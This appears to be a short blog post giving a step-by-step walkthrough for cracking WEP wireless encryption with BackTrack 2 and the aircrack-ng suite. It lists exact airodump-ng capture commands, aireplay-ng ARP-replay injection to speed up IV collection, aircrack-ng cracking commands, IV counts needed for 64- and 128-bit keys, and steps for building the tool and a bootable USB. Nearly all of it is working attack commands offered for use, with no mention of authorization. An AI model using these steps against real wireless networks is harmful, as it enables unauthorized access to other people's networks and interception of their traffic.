- Boot into BT2.
- Set your wireless card using the iwconfig command to monitor mode.
- Assuming the interface is eth0, use iwconfig eth0 mode monitor.
- If you use Kismet, the monitor mode will be set automatically.
- Kismet must be started in X-Windows if you do not wish to manually edit the conf file.
- From Kismet, remember AP SSID (bssid), AP MAC, Channel and Client MAC.
- Use airodump-ng --channel Channel
--bssid AP MAC --write capturefile eth0 . This will capture all packets. - Use airodump-ng --ivs --channel
Channel --bssid AP MAC --write capturefile eth0 to capture IVs only. - The values of RXQ and PWR must be high. This will speed up the packet capture process.
- To increase #DATA value, use aireplay-ng command.
- Use aireplay-ng --arpreplay -b AP MAC -h Client MAC eth0. This will cause the AP to generate ARP packets, vital to increase the #DATA count.
- To crack WEP 64 bit, you'd need at least 300K of IVs and 1500K if cracking a 128 bit WEP encryption.
- Use aircrack-ng -z -b AP MAC capturefile*.cap (upgrade your aircrack to version 0.9.1 or later to perform PTW crack).
- Use aircrack-ng -f 8 -x2 -b AP MAC capturefile*.ivs (to decipher IVs only).
Update aircrack-ng
Update aircrack to enable PTW cracking (faster; I cracked a WEP 64 using 8K of packets)
- wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
- tar xvfz aircrack-ng-0.9.1.tar.gz
- cd aircrack-ng-0.9.1
- make
- make install
- Copy all the content of the bt2final.iso to a USB drive (at least 1GB)
- Execute \boot\bootinst.bat
Also, you can start multiple aireplay-ng sessions if you have more than 1 Client MAC found. BT2 provides 6 pseudo-terminals. Use it to your advantage.
Cheers!
No comments:
Post a Comment